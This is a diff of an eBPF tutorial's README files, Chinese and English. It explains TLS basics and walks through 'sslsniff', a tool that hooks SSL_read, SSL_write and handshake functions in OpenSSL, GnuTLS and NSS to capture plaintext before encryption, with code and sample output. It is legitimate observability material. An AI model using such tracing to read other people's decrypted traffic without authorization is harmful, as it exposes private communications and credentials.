**生成会话密钥**:为了生成用于安全连接的会话密钥,客户端有以下两种方法: + - 使用服务器的公钥加密一个随机数(PreMasterSecret)并将结果发送到服务器(只有服务器才能使用其私钥解密);双方然后使用该随机数生成一个独特的会话密钥,用于会话期间的数据加密和解密。 + - 使用 Diffie-Hellman 密钥交换(或其变体椭圆曲线DH)来安全地生成一个随机且独特的会话密钥,用于加密和解密,该密钥具有前向保密的额外属性:即使在未来公开了服务器的私钥,也不能用它来解密当前的会话,即使第三方拦截并记录了会话。 + +一旦上述步骤成功完成,握手过程便结束,加密的连接开始。此连接使用会话密钥进行加密和解密,直到连接关闭。如果上述任何步骤失败,则TLS握手失败,连接将不会建立。 + +#### OSI模型中的TLS + +TLS 和 SSL 不完全适合 OSI 模型或 TCP/IP 模型的任何单一层次。TLS 在“某些可靠的传输协议(例如,TCP)之上运行”,这意味着它位于传输层之上。它为更高的层提供加密,这通常是表示层的功能。但是,使用TLS 的应用程序通常视其为传输层,即使使用TLS的应用程序必须积极控制启动 TLS 握手和交换的认证证书的处理。 + +### eBPF 和 uprobe + +eBPF (Extended Berkeley Packet Filter): 是一种内核技术,允许用户在内核空间中运行预定义的程序,不需要修改内核源代码或重新加载模块。它创建了一个桥梁,使得用户空间和内核空间可以交互,从而为系统监控、性能分析和网络流量分析等任务提供了无前例的能力。 + +uprobes 是eBPF的一个重要特性,允许我们在用户空间应用程序中动态地插入探测点,特别适用于跟踪SSL/TLS库中的函数调用。Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 + +### 用户态库 + +SSL/TLS协议的实现主要依赖于用户态库。以下是一些常见的库: + +- OpenSSL: 一个开源的、功能齐全的加密库,广泛应用于许多开源和商业项目中。 +- BoringSSL: 是Google维护的OpenSSL的一个分支,重点是简化和优化,适用于Google的需求。 +- GnuTLS: 是GNU项目的一部分,提供了SSL,TLS和DTLS协议的实现。与OpenSSL和BoringSSL相比,GnuTLS在API设计、模块结构和许可证上有所不同。 + +## OpenSSL API 分析 + +OpenSSL 是一个广泛应用的开源库,提供了 SSL 和 TLS 协议的完整实现,并广泛用于各种应用程序中以确保数据传输的安全性。其中,SSL_read() 和 SSL_write() 是两个核心的 API 函数,用于从 TLS/SSL 连接中读取和写入数据。本章节,我们将深入这两个函数,帮助你理解其工作机制。 + +### 1. SSL_read 函数 + +当我们想从一个已建立的 SSL 连接中读取数据时,可以使用 `SSL_read` 或 `SSL_read_ex` 函数。函数原型如下: + +```c +int SSL_read_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); +int SSL_read(SSL *ssl, void *buf, int num); +``` + +`SSL_read` 和 `SSL_read_ex` 试图从指定的 `ssl` 中读取最多 `num` 字节的数据到缓冲区 `buf` 中。成功时,`SSL_read_ex` 会在 `*readbytes` 中存储实际读取到的字节数。 + +### 2. 
SSL_write 函数 + +当我们想往一个已建立的 SSL 连接中写入数据时,可以使用 `SSL_write` 或 `SSL_write_ex` 函数。 + +函数原型: + +```c +int SSL_write_ex(SSL *s, const void *buf, size_t num, size_t *written); +int SSL_write(SSL *ssl, const void *buf, int num); +``` + +`SSL_write` 和 `SSL_write_ex` 会从缓冲区 `buf` 中将最多 `num` 字节的数据写入到指定的 `ssl` 连接中。成功时,`SSL_write_ex` 会在 `*written` 中存储实际写入的字节数。 + +## eBPF 内核态代码编写 + +在我们的例子中,我们使用 eBPF 来 hook ssl_read 和 ssl_write 函数,从而在数据读取或写入 SSL 连接时执行自定义操作。 + +### 数据结构 + +首先,我们定义了一个数据结构 probe_SSL_data_t 用于在内核态和用户态之间传输数据: + +```c +#define MAX_BUF_SIZE 8192 +#define TASK_COMM_LEN 16 + +struct probe_SSL_data_t { + __u64 timestamp_ns; // 时间戳(纳秒) + __u64 delta_ns; // 函数执行时间 + __u32 pid; // 进程 ID + __u32 tid; // 线程 ID + __u32 uid; // 用户 ID + __u32 len; // 读/写数据的长度 + int buf_filled; // 缓冲区是否填充完整 + int rw; // 读或写(0为读,1为写) + char comm[TASK_COMM_LEN]; // 进程名 + __u8 buf[MAX_BUF_SIZE]; // 数据缓冲区 + int is_handshake; // 是否是握手数据 +}; +``` + +### Hook 函数 + +我们的目标是 hook 到 `SSL_read` 和 `SSL_write` 函数。我们定义了一个函数 `SSL_exit` 来处理这两个函数的返回值。该函数会根据当前进程和线程的 ID,确定是否需要追踪并收集数据。 + +```c +static int SSL_exit(struct pt_regs *ctx, int rw) { + int ret = 0; + u32 zero = 0; + u64 pid_tgid = bpf_get_current_pid_tgid(); + u32 pid = pid_tgid >> 32; + u32 tid = (u32)pid_tgid; + u32 uid = bpf_get_current_uid_gid(); + u64 ts = bpf_ktime_get_ns(); + + if (!trace_allowed(uid, pid)) { + return 0; + } + + /* store arg info for later lookup */ + u64 *bufp = bpf_map_lookup_elem(&bufs, &tid); + if (bufp == 0) + return 0; + + u64 *tsp = bpf_map_lookup_elem(&start_ns, &tid); + if (!tsp) + return 0; + u64 delta_ns = ts - *tsp; + + int len = PT_REGS_RC(ctx); + if (len <= 0) // no data + return 0; + + struct probe_SSL_data_t *data = bpf_map_lookup_elem(&ssl_data, &zero); + if (!data) + return 0; + + data->timestamp_ns = ts; + data->delta_ns = delta_ns; + data->pid = pid; + data->tid = tid; + data->uid = uid; + data->len = (u32)len; + data->buf_filled = 0; + data->rw = rw; + data->is_handshake = false; + u32 buf_copy_size = min((size_t)MAX_BUF_SIZE, (size_t)len); + + bpf_get_current_comm(&data->comm, sizeof(data->comm)); + + if (bufp != 0) + ret = bpf_probe_read_user(&data->buf, buf_copy_size, (char *)*bufp); + + bpf_map_delete_elem(&bufs, &tid); + bpf_map_delete_elem(&start_ns, &tid); + + if (!ret) + data->buf_filled = 1; + else + buf_copy_size = 0; + + bpf_perf_event_output(ctx, &perf_SSL_events, BPF_F_CURRENT_CPU, data, + EVENT_SIZE(buf_copy_size)); + return 0; +} +``` + +这里的 `rw` 参数标识是读还是写。0 代表读,1 代表写。 + +#### 数据收集流程 + +1. 获取当前进程和线程的 ID,以及当前用户的 ID。 +2. 通过 `trace_allowed` 判断是否允许追踪该进程。 +3. 获取起始时间,以计算函数的执行时间。 +4. 尝试从 `bufs` 和 `start_ns` maps 中查找相关的数据。 +5. 如果成功读取了数据,则创建或查找 `probe_SSL_data_t` 结构来填充数据。 +6. 将数据从用户空间复制到缓冲区,并确保不超过预定的大小。 +7. 
最后,将数据发送到用户空间。 + +注意:我们使用了两个用户返回探针 `uretprobe` 来分别 hook `SSL_read` 和 `SSL_write` 的返回: + +```c +SEC("uretprobe/SSL_read") +int BPF_URETPROBE(probe_SSL_read_exit) { + return (SSL_exit(ctx, 0)); // 0 表示读操作 +} + +SEC("uretprobe/SSL_write") +int BPF_URETPROBE(probe_SSL_write_exit) { + return (SSL_exit(ctx, 1)); // 1 表示写操作 +} +``` + +### Hook到握手过程 + +在 SSL/TLS 中,握手(handshake)是一个特殊的过程,用于在客户端和服务器之间建立安全的连接。为了分析此过程,我们 hook 到了 `do_handshake` 函数,以跟踪握手的开始和结束。 + +#### 进入握手 + +我们使用 `uprobe` 为 `do_handshake` 设置一个 probe: + +```c + +SEC("uprobe/do_handshake") +int BPF_UPROBE(probe_SSL_do_handshake_enter, void *ssl) { + u64 pid_tgid = bpf_get_current_pid_tgid(); + u32 pid = pid_tgid >> 32; + u32 tid = (u32)pid_tgid; + u64 ts = bpf_ktime_get_ns(); + u32 uid = bpf_get_current_uid_gid(); + + if (!trace_allowed(uid, pid)) { + return 0; + } + + /* store arg info for later lookup */ + bpf_map_update_elem(&start_ns, &tid, &ts, BPF_ANY); + return 0; +} +``` + +这段代码的主要功能如下: + +1. 获取当前的 `pid`, `tid`, `ts` 和 `uid`。 +2. 使用 `trace_allowed` 检查进程是否被允许追踪。 +3. 将当前时间戳存储在 `start_ns` 映射中,用于稍后计算握手过程的持续时间。 + +#### 退出握手 + +同样,我们为 `do_handshake` 的返回设置了一个 `uretprobe`: + +```c + +SEC("uretprobe/do_handshake") +int BPF_URETPROBE(probe_SSL_do_handshake_exit) { + u32 zero = 0; + u64 pid_tgid = bpf_get_current_pid_tgid(); + u32 pid = pid_tgid >> 32; + u32 tid = (u32)pid_tgid; + u32 uid = bpf_get_current_uid_gid(); + u64 ts = bpf_ktime_get_ns(); + int ret = 0; + + /* use kernel terminology here for tgid/pid: */ + u32 tgid = pid_tgid >> 32; + + /* store arg info for later lookup */ + if (!trace_allowed(tgid, pid)) { + return 0; + } + + u64 *tsp = bpf_map_lookup_elem(&start_ns, &tid); + if (tsp == 0) + return 0; + + ret = PT_REGS_RC(ctx); + if (ret <= 0) // handshake failed + return 0; + + struct probe_SSL_data_t *data = bpf_map_lookup_elem(&ssl_data, &zero); + if (!data) + return 0; + + data->timestamp_ns = ts; + data->delta_ns = ts - *tsp; + data->pid = pid; + data->tid = tid; + data->uid = uid; + data->len = ret; + data->buf_filled = 0; + data->rw = 2; + data->is_handshake = true; + bpf_get_current_comm(&data->comm, sizeof(data->comm)); + bpf_map_delete_elem(&start_ns, &tid); + + bpf_perf_event_output(ctx, &perf_SSL_events, BPF_F_CURRENT_CPU, data, + EVENT_SIZE(0)); + return 0; +} +``` + +此函数的逻辑如下: + +1. 获取当前的 `pid`, `tid`, `ts` 和 `uid`。 +2. 使用 `trace_allowed` 再次检查是否允许追踪。 +3. 查找 `start_ns` 映射中的时间戳,用于计算握手的持续时间。 +4. 使用 `PT_REGS_RC(ctx)` 获取 `do_handshake` 的返回值,判断握手是否成功。 +5. 查找或初始化与当前线程关联的 `probe_SSL_data_t` 数据结构。 +6. 更新数据结构的字段,包括时间戳、持续时间、进程信息等。 +7. 通过 `bpf_perf_event_output` 将数据发送到用户态。 + +我们的 eBPF 代码不仅跟踪了 `ssl_read` 和 `ssl_write` 的数据传输,还特别关注了 SSL/TLS 的握手过程。这些信息对于深入了解和优化安全连接的性能至关重要。 + +通过这些 hook 函数,我们可以获得关于握手成功与否、握手所需的时间以及相关的进程信息的数据。这为我们提供了关于系统 SSL/TLS 行为的深入见解,可以帮助我们在需要时进行更深入的分析和优化。 + +## 用户态辅助代码分析与解读 + +在 eBPF 的生态系统中,用户态和内核态代码经常协同工作。内核态代码负责数据的采集,而用户态代码则负责设置、管理和处理这些数据。在本节中,我们将解读上述用户态代码如何配合 eBPF 追踪 SSL/TLS 交互。 + +### 1. 
支持的库挂载 + +上述代码片段中,根据环境变量 `env` 的设定,程序可以选择针对三种常见的加密库(OpenSSL、GnuTLS 和 NSS)进行挂载。这意味着我们可以在同一个工具中对多种库的调用进行追踪。 + +为了实现这一功能,首先利用 `find_library_path` 函数确定库的路径。然后,根据库的类型,调用对应的 `attach_` 函数来将 eBPF 程序挂载到库函数上。 + +```c + if (env.openssl) { + char *openssl_path = find_library_path("libssl.so"); + printf("OpenSSL path: %s\n", openssl_path); + attach_openssl(obj, openssl_path); + } + if (env.gnutls) { + char *gnutls_path = find_library_path("libgnutls.so"); + printf("GnuTLS path: %s\n", gnutls_path); + attach_gnutls(obj, gnutls_path); + } + if (env.nss) { + char *nss_path = find_library_path("libnspr4.so"); + printf("NSS path: %s\n", nss_path); + attach_nss(obj, nss_path); + } +``` + +这里主要包含 OpenSSL、GnuTLS 和 NSS 三个库的挂载逻辑。NSS 是为组织设计的一套安全库,支持创建安全的客户端和服务器应用程序。它们最初是由 Netscape 开发的,现在由 Mozilla 维护。其他两个库前面已经介绍过了,这里不再赘述。 + +### 2. 详细挂载逻辑 + +具体的 attach 函数如下: + +```c +#define __ATTACH_UPROBE(skel, binary_path, sym_name, prog_name, is_retprobe) \ + do { \ + LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts, .func_name = #sym_name, \ + .retprobe = is_retprobe); \ + skel->links.prog_name = bpf_program__attach_uprobe_opts( \ + skel->progs.prog_name, env.pid, binary_path, 0, &uprobe_opts); \ + } while (false) + +int attach_openssl(struct sslsniff_bpf *skel, const char *lib) { + ATTACH_UPROBE_CHECKED(skel, lib, SSL_write, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, SSL_write, probe_SSL_write_exit); + ATTACH_UPROBE_CHECKED(skel, lib, SSL_read, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, SSL_read, probe_SSL_read_exit); + + if (env.latency && env.handshake) { + ATTACH_UPROBE_CHECKED(skel, lib, SSL_do_handshake, + probe_SSL_do_handshake_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, SSL_do_handshake, + probe_SSL_do_handshake_exit); + } + + return 0; +} + +int attach_gnutls(struct sslsniff_bpf *skel, const char *lib) { + ATTACH_UPROBE_CHECKED(skel, lib, gnutls_record_send, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, gnutls_record_send, probe_SSL_write_exit); + ATTACH_UPROBE_CHECKED(skel, lib, gnutls_record_recv, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, gnutls_record_recv, probe_SSL_read_exit); + + return 0; +} + +int attach_nss(struct sslsniff_bpf *skel, const char *lib) { + ATTACH_UPROBE_CHECKED(skel, lib, PR_Write, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, PR_Write, probe_SSL_write_exit); + ATTACH_UPROBE_CHECKED(skel, lib, PR_Send, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, PR_Send, probe_SSL_write_exit); + ATTACH_UPROBE_CHECKED(skel, lib, PR_Read, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, PR_Read, probe_SSL_read_exit); + ATTACH_UPROBE_CHECKED(skel, lib, PR_Recv, probe_SSL_rw_enter); + ATTACH_URETPROBE_CHECKED(skel, lib, PR_Recv, probe_SSL_read_exit); + + return 0; +} +``` + +我们进一步观察 `attach_` 函数,可以看到它们都使用了 `ATTACH_UPROBE_CHECKED` 和 `ATTACH_URETPROBE_CHECKED` 宏来实现具体的挂载逻辑。这两个宏分别用于设置 uprobe(函数入口)和 uretprobe(函数返回)。 + +考虑到不同的库有不同的 API 函数名称(例如,OpenSSL 使用 `SSL_write`,而 GnuTLS 使用 `gnutls_record_send`),所以我们需要为每个库写一个独立的 `attach_` 函数。 + +例如,在 `attach_openssl` 函数中,我们为 `SSL_write` 和 `SSL_read` 设置了 probe。如果用户还希望追踪握手的延迟 (`env.latency`) 和握手过程 (`env.handshake`),那么我们还会为 `SSL_do_handshake` 设置 probe。 + +在eBPF生态系统中,perf_buffer是一个用于从内核态传输数据到用户态的高效机制。这对于内核态eBPF程序来说是十分有用的,因为它们不能直接与用户态进行交互。使用perf_buffer,我们可以在内核态eBPF程序中收集数据,然后在用户态异步地读取这些数据。我们使用 `perf_buffer__poll` 函数来读取内核态上报的数据,如下所示: + +```c + while (!exiting) { + err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS); + if (err < 0 && err != -EINTR) { + warn("error polling perf buffer: %s\n", 
strerror(-err)); + goto cleanup; + } + err = 0; + } +``` + +最后,在 print_event 函数中,我们将数据打印到标准输出: + +```c +// Function to print the event from the perf buffer +void print_event(struct probe_SSL_data_t *event, const char *evt) { + ... + if (buf_size != 0) { + if (env.hexdump) { + // 2 characters for each byte + null terminator + char hex_data[MAX_BUF_SIZE * 2 + 1] = {0}; + buf_to_hex((uint8_t *)buf, buf_size, hex_data); + + printf("\n%s\n", s_mark); + for (size_t i = 0; i < strlen(hex_data); i += 32) { + printf("%.32s\n", hex_data + i); + } + printf("%s\n\n", e_mark); + } else { + printf("\n%s\n%s\n%s\n\n", s_mark, buf, e_mark); + } + } +} +``` + +完整的源代码可以在这里查看: + +## 编译与运行 + +关于如何安装依赖,请参考: + +要开始使用 `sslsniff`,首先要进行编译: + +```sh +make +``` + +完成后,请按照以下步骤操作: + +### **启动 sslsniff** + +在一个终端中,执行以下命令来启动 `sslsniff`: + +```sh +sudo ./sslsniff +``` + +### **执行 CURL 命令** + +在另一个终端中,执行: + +```console +curl https://example.com +``` + +正常情况下,你会看到类似以下的输出: + +```html + + + + Example Domain + ... + +
+ ... +
+ + +``` + +### **sslsniff 输出** + +当执行 `curl` 命令后,`sslsniff` 会显示以下内容: + +```txt + READ/RECV 0.132786160 curl 47458 1256 + ----- DATA ----- + + ... +
+<html>
+<head>
+<title>Example Domain</title>
+</head>
+...
+ + + + ----- END DATA ----- +``` + +**注意**:显示的 HTML 内容可能会因 `example.com` 页面的不同而有所不同。 + +### 显示延迟和握手过程 + +要查看延迟和握手过程,请执行以下命令: + +```console +$ sudo ./sslsniff -l --handshake +OpenSSL path: /lib/x86_64-linux-gnu/libssl.so.3 +GnuTLS path: /lib/x86_64-linux-gnu/libgnutls.so.30 +NSS path: /lib/x86_64-linux-gnu/libnspr4.so +FUNC TIME(s) COMM PID LEN LAT(ms) +HANDSHAKE 0.000000000 curl 6460 1 1.384 WRITE/SEND 0.000115400 curl 6460 24 0.014 +``` + +### 16进制输出 + +要以16进制格式显示数据,请执行以下命令: + +```console +$ sudo ./sslsniff --hexdump +WRITE/SEND 0.000000000 curl 16104 24 +----- DATA ----- +505249202a20485454502f322e300d0a +0d0a534d0d0a0d0a +----- END DATA ----- + +... +``` + +## 总结 + +eBPF 是一个非常强大的技术,它可以帮助我们深入了解系统的工作原理。本教程是一个简单的示例,展示了如何使用 eBPF 来监控 SSL/TLS 通信。如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 + +参考资料: + +- +- +- +- +- diff --git a/src/30-sslsniff/README_en.md b/src/30-sslsniff/README_en.md deleted file mode 100644 index c1b8dcf..0000000 --- a/src/30-sslsniff/README_en.md +++ /dev/null @@ -1,544 +0,0 @@ -# eBPF Practical Tutorial: Capturing SSL/TLS Plain Text Data Using uprobe - -With the widespread use of TLS in modern network environments, tracing microservices RPC messages has become increasingly challenging. Traditional traffic sniffing techniques often face limitations in accessing only encrypted data, preventing a genuine observation of the original communication content. This restriction poses significant obstacles to system debugging and analysis. - -However, a new solution is now available. Through the use of eBPF technology and its capability to perform probing in user space, a method has emerged to regain plain text data, allowing us to intuitively view the pre-encrypted communication content. Nevertheless, each application might utilize different libraries, and each library comes in multiple versions, introducing complexity to the tracking process. - -In this tutorial, we will guide you through an eBPF tracing technique that spans across various user-space SSL/TLS libraries. This technique not only allows simultaneous tracing of user-space libraries like GnuTLS and OpenSSL but also significantly reduces maintenance efforts for new library versions compared to previous methods. The complete code for this tutorial can be found in <完整的源代码可以在这里查看: - -## Background Knowledge - -Before delving into the main topic of this tutorial, we need to grasp some core concepts that will serve as the foundation for our subsequent discussions. - -### SSL and TLS - -SSL (Secure Sockets Layer): Developed by Netscape in the early 1990s, SSL provides data encryption for communication between two machines on a network. However, due to known security vulnerabilities, SSL has been succeeded by its successor, TLS. - -TLS (Transport Layer Security): TLS is the successor to SSL, aiming to provide stronger and more secure data encryption methods. TLS operates through a handshake process during which a client and a server select an encryption algorithm and corresponding keys. Once the handshake is complete, data transmission begins, with all data being encrypted using the chosen algorithm and keys. - -### Operation Principles of TLS - -Transport Layer Security (TLS) is a cryptographic protocol designed to provide security for communication over computer networks. Its primary goal is to provide security, including privacy (confidentiality), integrity, and authenticity, for two or more communicating computer applications over a network using cryptography, such as certificates. 
TLS consists of two sub-layers: the TLS Record Protocol and the TLS Handshake Protocol. - -#### Handshake Process - -When a client connects to a TLS-enabled server and requests a secure connection, the handshake process begins. The handshake allows the client and server to establish security parameters for the connection using asymmetric cryptography. The complete process is as follows: - -1. **Initial Handshake**: The client connects to the TLS-enabled server, requests a secure connection, and provides a list of supported cipher suites (encryption algorithms and hash functions). -2. **Selecting Cipher Suite**: From the provided list, the server chooses a cipher suite and hash function it also supports and notifies the client of the decision. -3. **Providing Digital Certificate**: Usually, the server then provides identity authentication in the form of a digital certificate. This certificate includes the server's name, trusted certificate authorities (guaranteeing the certificate's authenticity), and the server's public encryption key. -4. **Certificate Verification**: The client verifies the certificate's validity before proceeding. -5. **Generating Session Key**: To create a session key for a secure connection, the client has two methods: - - Encrypt a random number (PreMasterSecret) with the server's public key and send the result to the server (only the server can decrypt it with its private key); both parties then use this random number to generate a unique session key for encrypting and decrypting data during the session. - - Use Diffie-Hellman key exchange (or its variant, Elliptic Curve DH) to securely generate a random and unique session key for encryption and decryption. This key has the additional property of forward secrecy: even if the server's private key is exposed in the future, it can't be used to decrypt the current session, even if a third party intercepts and records the session. - -Once these steps are successfully completed, the handshake process concludes, and the encrypted connection begins. This connection uses the session key for encryption and decryption until the connection is closed. If any of the above steps fail, the TLS handshake fails, and the connection won't be established. - -#### TLS in the OSI Model - -TLS and SSL don't perfectly align with any single layer of the OSI model or the TCP/IP model. TLS "runs over some reliable transport protocol (such as TCP)," which means it sits above the transport layer. It provides encryption for higher layers, typically the presentation layer. However, applications using TLS often consider it the transport layer, even though applications using TLS must actively control the initiation of TLS handshakes and the handling of exchanged authentication certificates. - -### eBPF and uprobes - -eBPF (Extended Berkeley Packet Filter): It's a kernel technology that allows users to run predefined programs in the kernel space without modifying kernel source code or reloading modules. It creates a bridge that enables interaction between user space and kernel space, providing unprecedented capabilities for tasks like system monitoring, performance analysis, and network traffic analysis. - -uprobes are a significant feature of eBPF, allowing dynamic insertion of probe points in user space applications, particularly useful for tracking function calls in SSL/TLS libraries. Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. 
In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs. bpftime can have a performance overhead that is one order of magnitude smaller than that of kernel mode eBPF. - -### User-Space Libraries - -The implementation of the SSL/TLS protocol heavily relies on user-space libraries. Here are some common ones: - -- OpenSSL: An open-source, feature-rich cryptographic library widely used in many open-source and commercial projects. -- BoringSSL: A fork of OpenSSL maintained by Google, focusing on simplification and optimization for Google's needs. -- GnuTLS: Part of the GNU project, offering an implementation of SSL, TLS, and DTLS protocols. GnuTLS differs from OpenSSL and BoringSSL in API design, module structure, and licensing. - -## OpenSSL API Analysis - -OpenSSL is a widely used open-source library providing a complete implementation of the SSL and TLS protocols, ensuring data transmission security in various applications. Among its functions, SSL_read() and SSL_write() are two core API functions for reading from and writing to TLS/SSL connections. In this section, we'll delve into these functions to help you understand their mechanisms. - -### 1. SSL_read Function - -When we want to read data from an established SSL connection, we can use the `SSL_read` or `SSL_read_ex` function. The function prototype is as follows: - -```c -int SSL_read_ex(SSL *ssl, void *buf, size_t num, size_t *readbytes); -int SSL_read(SSL *ssl, void *buf, int num); -``` - -`SSL_read` and `SSL_read_ex` attempt to read up to `num` bytes of data from the specified `ssl` into the buffer `buf`. Upon success, `SSL_read_ex` stores the actual number of read bytes in `*readbytes`. - -### 2. Function SSL_write - -When we want to write data into an established SSL connection, we can use the `SSL_write` or `SSL_write_ex` functions. - -Function prototype: - -```c -int SSL_write_ex(SSL *s, const void *buf, size_t num, size_t *written); -int SSL_write(SSL *ssl, const void *buf, int num); -``` - -`SSL_write` and `SSL_write_ex` will write up to `num` bytes of data from the buffer `buf` into the specified `ssl` connection. Upon success, `SSL_write_ex` will store the actual number of written bytes in `*written`. - -## Writing eBPF Kernel Code - -In our example, we use eBPF to hook the `ssl_read` and `ssl_write` functions to perform custom actions when data is read from or written to an SSL connection. - -### Data Structures - -Firstly, we define a data structure `probe_SSL_data_t` to transfer data between kernel and user space: - -```c -#define MAX_BUF_SIZE 8192 -#define TASK_COMM_LEN 16 - -struct probe_SSL_data_t { - __u64 timestamp_ns; // Timestamp (nanoseconds) - __u64 delta_ns; // Function execution time - __u32 pid; // Process ID - __u32 tid; // Thread ID - __u32 uid; // User ID - __u32 len; // Length of read/write data - int buf_filled; // Whether buffer is filled completely - int rw; // Read or Write (0 for read, 1 for write) - char comm[TASK_COMM_LEN]; // Process name - __u8 buf[MAX_BUF_SIZE]; // Data buffer - int is_handshake; // Whether it's handshake data -}; -``` - -### Hook Functions - -Our goal is to hook into the `SSL_read` and `SSL_write` functions. 
We define a function `SSL_exit` to handle the return values of these two functions. This function determines whether to trace and collect data based on the current process and thread IDs. - -```c -static int SSL_exit(struct pt_regs *ctx, int rw) { - int ret = 0; - u32 zero = 0; - u64 pid_tgid = bpf_get_current_pid_tgid(); - u32 pid = pid_tgid >> 32; - u32 tid = (u32)pid_tgid; - u32 uid = bpf_get_current_uid_gid(); - u64 ts = bpf_ktime_get_ns(); - - if (!trace_allowed(uid, pid)) { - return 0; - } - - /* store arg info for later lookup */ - u64 *bufp = bpf_map_lookup_elem(&bufs, &tid); - if (bufp == 0) - return 0; - - u64 *tsp = bpf_map_lookup_elem(&start_ns, &tid); - if (!tsp) - return 0; - u64 delta_ns = ts - *tsp; - - int len = PT_REGS_RC(ctx); - if (len <= 0) // no data - return 0; - - struct probe_SSL_data_t *data = bpf_map_lookup_elem(&ssl_data, &zero); - if (!data) - return 0; - - data->timestamp_ns = ts; - data->delta_ns = delta_ns; - data->pid = pid; - data->tid = tid; - data->uid = uid; - data->len = (u32)len; - data->buf_filled = 0; - data->rw = rw; - data->is_handshake = false; - u32 buf_copy_size = min((size_t)MAX_BUF_SIZE, (size_t)len); - - bpf_get_current_comm(&data->comm, sizeof(data->comm)); - - if (bufp != 0) - ret = bpf_probe_read_user(&data->buf, buf_copy_size, (char *)*bufp); - - bpf_map_delete_elem(&bufs, &tid); - bpf_map_delete_elem(&start_ns, &tid); - - if (!ret) - data->buf_filled = 1; - else - buf_copy_size = 0; - - bpf_perf_event_output(ctx, &perf_SSL_events, BPF_F_CURRENT_CPU, data, - EVENT_SIZE(buf_copy_size)); - return 0; -} -``` - -The `rw` parameter here indicates whether it's a read or write operation. 0 represents read, and 1 represents write. - -#### Data Collection Process - -1. Obtain the ID of the current process and thread, along with the ID of the current user. -2. Use `trace_allowed` to determine if tracing is allowed for this process. -3. Get the start time to calculate the execution time of the function. -4. Attempt to retrieve relevant data from the `bufs` and `start_ns` maps. -5. If data retrieval is successful, create or locate a `probe_SSL_data_t` structure to populate the data. -6. Copy the data from user space to the buffer, ensuring it doesn't exceed the designated size. -7. Finally, send the data to user space. - -Note: We use two user-level return probes `uretprobe` to respectively hook the returns of `SSL_read` and `SSL_write`: - -```c -SEC("uretprobe/SSL_read") -int BPF_URETPROBE(probe_SSL_read_exit) { - return (SSL_exit(ctx, 0)); // 0 indicates read operation -} - -SEC("uretprobe/SSL_write") -int BPF_URETPROBE(probe_SSL_write_exit) { - return (SSL_exit(ctx, 1)); // 1 indicates write operation -} -``` - -### Hooking into the Handshake Process - -In SSL/TLS, the handshake is a special process used to establish a secure connection between a client and a server. To analyze this process, we hook into the `do_handshake` function to track the start and end of the handshake. 
- -#### Entering the Handshake - -We use a `uprobe` to set a probe for the `do_handshake` function: - -```c - -SEC("uprobe/do_handshake") -int BPF_UPROBE(probe_SSL_do_handshake_enter, void *ssl) { - u64 pid_tgid = bpf_get_current_pid_tgid(); - u32 pid = pid_tgid >> 32; - u32 tid = (u32)pid_tgid; - u64 ts = bpf_ktime_get_ns(); - u32 uid = bpf_get_current_uid_gid(); - - if (!trace_allowed(uid, pid)) { - return 0; - } - - /* store arg info for later lookup */ - bpf_map_update_elem(&start_ns, &tid, &ts, BPF_ANY); - return 0; -} -``` - -The main functionality of this code is as follows: - -1. Obtain the current `pid`, `tid`, `ts`, and `uid`. -2. Use `trace_allowed` to verify if the process is allowed to be traced. -3. Store the current timestamp in the `start_ns` map, which will be used to calculate the duration of the handshake process later. - -#### Exiting the Handshake - -Similarly, we've set a `uretprobe` for the return of `do_handshake`: - -```c -SEC("uretprobe/do_handshake") -int BPF_URETPROBE(handle_do_handshake_exit) { - // Code to execute upon exiting the do_handshake function. - return 0; -} -``` - -In this context, the `uretprobe` will execute the provided code when the `do_handshake` function exits. - -```c - -SEC("uretprobe/do_handshake") -int BPF_URETPROBE(probe_SSL_do_handshake_exit) { - u32 zero = 0; - u64 pid_tgid = bpf_get_current_pid_tgid(); - u32 pid = pid_tgid >> 32; - u32 tid = (u32)pid_tgid; - u32 uid = bpf_get_current_uid_gid(); - u64 ts = bpf_ktime_get_ns(); - int ret = 0; - - /* use kernel terminology here for tgid/pid: */ - u32 tgid = pid_tgid >> 32; - - /* store arg info for later lookup */ - if (!trace_allowed(tgid, pid)) { - return 0; - } - - u64 *tsp = bpf_map_lookup_elem(&start_ns, &tid); - if (tsp == 0) - return 0; - - ret = PT_REGS_RC(ctx); - if (ret <= 0) // handshake failed - return 0; - - struct probe_SSL_data_t *data = bpf_map_lookup_elem(&ssl_data, &zero); - if (!data) - return 0; - - data->timestamp_ns = ts; - data->delta_ns = ts - *tsp; - data->pid = pid; - data->tid = tid; - data->uid = uid; - data->len = ret; - data->buf_filled = 0; - data->rw = 2; - data->is_handshake = true; - bpf_get_current_comm(&data->comm, sizeof(data->comm)); - bpf_map_delete_elem(&start_ns, &tid); - - bpf_perf_event_output(ctx, &perf_SSL_events, BPF_F_CURRENT_CPU, data, - EVENT_SIZE(0)); - return 0; -} -``` - -Logic of this Function: - -1. Obtain the current `pid`, `tid`, `ts`, and `uid`. -2. Use `trace_allowed` to recheck if tracing is allowed. -3. Look up the timestamp in the `start_ns` map for calculating handshake duration. -4. Use `PT_REGS_RC(ctx)` to get the return value of 